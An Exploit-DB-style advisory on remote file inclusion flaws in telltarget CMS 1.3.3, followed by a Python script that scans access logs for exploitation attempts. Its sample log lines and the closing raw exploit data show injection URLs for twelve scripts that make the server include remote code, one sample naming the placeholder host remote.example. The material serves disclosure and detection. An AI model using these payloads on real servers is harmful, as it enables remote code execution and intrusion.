Vendor: telltarget CMS
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
Multiple Remote File Inclusion
CWE: Not available
Product Name: telltarget CMS
Affected Version From: 1.3.2003
Affected Version To: 1.3.2003
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Not available
2007

telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilities

telltarget CMS 1.3.3 is vulnerable to multiple remote file inclusion vulnerabilities. Several PHP scripts take the location of a file to include from a request parameter (ordnertiefe in site_conf.php, tt_docroot in the other scripts), so an attacker who controls that parameter can make the server include and execute arbitrary files from remote servers. The vulnerable paths are:

- /phplib/site_conf.php
- /phplib/version/1.3.3/functionen/class.csv.php
- /phplib/version/1.3.3/functionen/produkte_nach_serie.php
- /phplib/version/1.3.3/functionen/ref_kd_rubrik.php
- /phplib/version/1.3.3/module/hg_referenz_jobgalerie.php
- /phplib/version/1.3.3/module/surfer_anmeldung_NWL.php
- /phplib/version/1.3.3/module/produkte_nach_serie_alle.php
- /phplib/version/1.3.3/module/surfer_aendern.php
- /phplib/version/1.3.3/module/ref_kd_rubrik.php
- /phplib/version/1.3.3/module/referenz.php
- /phplib/version/1.3.3/standard/1/lay.php
- /phplib/version/1.3.3/standard/3/lay.php

An attacker can exploit these vulnerabilities to execute arbitrary code and potentially gain unauthorized access to the affected system.

Mitigation:

To mitigate these vulnerabilities, users are advised to update to a patched version of telltarget CMS that addresses the file inclusion issues. It is also recommended to regularly update the CMS and apply security patches as they become available.
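
Past attempts against these scripts can be found in web server access logs. The following is an added example, not part of the original advisory: it flags requests to PHP scripts under /phplib/ whose ordnertiefe or tt_docroot value is a URL rather than a local path. The combined log format, the sample lines and the host remote.example are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names come from the advisory; the rest of this script is constructed.
RFI_PARAMS = {"ordnertiefe", "tt_docroot"}
# A value starting with a URL scheme ("http:", "ftp:", "php:") or "//" points off-host.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_rfi_attempts(log_lines):
    """Return (line_number, path, param, decoded_value) for suspicious requests."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # Every script listed in the advisory is a .php file under /phplib/.
        if "/phplib/" not in url.path or not url.path.endswith(".php"):
            continue
        # parse_qs percent-decodes values, so http%3A%2F%2F... is caught as well.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() not in RFI_PARAMS:
                continue
            for value in values:
                if REMOTE_VALUE.match(value):
                    hits.append((lineno, url.path, name, value))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2007:10:00:01 +0000] "GET /cms/phplib/site_conf.php?ordnertiefe=http://remote.example/a.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/May/2007:10:00:02 +0000] "GET /cms/phplib/version/1.3.3/module/referenz.php?tt_docroot=http%3A%2F%2Fremote.example%2Fa.txt HTTP/1.1" 200 498',
    '198.51.100.7 - - [09/May/2007:10:00:03 +0000] "GET /cms/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=/var/www/cms HTTP/1.1" 200 1024',
    '198.51.100.7 - - [09/May/2007:10:00:04 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, path, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"line {lineno}: {path} {param}={value}")
```

Only a single layer of percent-encoding is decoded, and parameters sent in a POST body do not appear in access logs, so a clean result does not rule out an attempt.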

Exploit-DB raw data:

# telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie
# D.Script: http://www.telltargetcms.de/download/telltarget_1.3.3.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
# Greetz To: Tryag-Team ....&&&

# milw0rm.com [2007-05-09]